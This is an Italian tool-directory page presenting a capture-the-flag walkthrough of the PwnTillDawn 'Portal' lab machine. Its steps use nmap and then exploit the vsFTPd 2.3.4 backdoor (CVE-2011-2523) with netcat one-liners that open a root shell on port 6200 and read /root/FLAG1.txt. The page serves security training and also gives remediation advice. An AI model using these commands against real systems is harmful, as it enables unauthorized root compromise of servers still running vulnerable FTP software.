Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PwnTillDawn-Portal-Walkthrough — Una dettagliata guida al penetration testing e report di sfruttamento per la macchina 'Portal', incentrata su CVE-2011-2523 (backdoor di vsFTPd 2.3.4) per ottenere accesso root. | Kitploit
Strumenti/GitHubGitHub/tr00jan99/pwntilldawn-portal-walkthrough
Escalation di PrivilegiRicognizioneAnalisi delle VulnerabilitàExploitPost-ExploitCTFPenetration TestingApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
tr00jan99/pwntilldawn-portal-walkthrough

PwnTillDawn-Portal-Walkthrough

Una dettagliata guida al penetration testing e report di sfruttamento per la macchina 'Portal', incentrata su CVE-2011-2523 (backdoor di vsFTPd 2.3.4) per ottenere accesso root.

Vedi Repository
25 mesi faNon ancora revisionato

🔐 Valutazione della Vulnerabilità e Test di Penetrazione (VAPT)

📌 Progetto: Walkthrough di Sfruttamento del Target

⚠️ Questo progetto è solo per scopi educativi e di test autorizzati.
L'accesso non autorizzato ai sistemi è severamente vietato.


👨‍💻 Autore

SYAFIQ
Ruolo: Penetration Tester Capo


🎯 Informazioni sul Target

  • IP del Target: 10.150.150.12
  • Sistema Operativo: Ubuntu Linux
  • Stato: 🔴 CRITICO (Backdoor Rilevata)
  • Vulnerabilità: CVE-2011-2523 (Backdoor vsFTPd)

🧭 Panoramica dell'Attacco

FaseStrumentoDescrizione
ScopertaNmapScansiona la rete per host attivi
EnumerazioneNmapIdentifica servizi e versioni
AnalisiNSE ScriptRileva vulnerabilità conosciute
SfruttamentoNetcatAttiva backdoor
Post-SfruttamentoTerminalOttieni accesso root e recupera flag

🚀 Walkthrough Passo-Passo

🔍 Step 1: Reconnaissance di Rete

Scansiona per host attivi nella rete:

root@kitploit:~
nmap -sn --unprivileged 10.150.150.10-30

✅ Risultato:

-8 host rilevati
-Target identificato: 10.150.150.12

🔎 Step 2: Enumerazione dei Servizi

Scansiona porte e servizi aperti:

root@kitploit:~
nmap -Pn -F --unprivileged -sV 10.150.150.12

✅ Risultati:

-Porta 21 → FTP (vsftpd)
-Porta 22 → SSH (OpenSSH 8.2p1)

⚠️ Step 3: Scansione delle Vulnerabilità

Verifica la presenza della vulnerabilità backdoor FTP nota:

root@kitploit:~
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12

🚨 Risultato:

-Il Target è VULNERABILE
-CVE-2011-2523 confermato

💣 Step 4: Sfruttamento

Attiva la backdoor usando un nome utente malevolo:

root@kitploit:~
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21

⚡ Questo apre una shell root nascosta sulla porta 6200

🔓 Step 5: Ottieni Accesso (Shell Root)

Connettiti alla backdoor ed esegui comandi:

root@kitploit:~
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200

✅ Risultato:

Accesso root ottenuto
uid=0(root) confermato

🏁 Flag Catturata:

root@kitploit:~
5ee499eb5d0b8e4269b13483e57adaa0b3815f48

🧠 Punti Chiave

  • Mantenere sempre aggiornati i servizi obsoleti (vsFTPd era vulnerabile)
  • Servizi malconfigurati possono portare al compromissione totale del sistema
  • Semplici scansioni possono rivelare vulnerabilità critiche

-🛡️ Raccomandazioni
-🔄 Aggiorna il servizio FTP all'ultima versione
-🚫 Disabilita servizi non necessari
-🔐 Usa un firewall per limitare l'accesso
-📊 Esegui audit di sicurezza regolari

-📚 Disclaimer

Questo progetto è creato rigorosamente per:

  • Imparare la cybersecurity
  • Pratica di hacking etico
  • Test di penetrazione autorizzati

❌ NON utilizzare questa conoscenza per attività illegali.

⭐ Nota Finale

“La sicurezza non è un prodotto, ma un processo.”
— Testa, monitora e migliora sempre.

Scarica lo strumento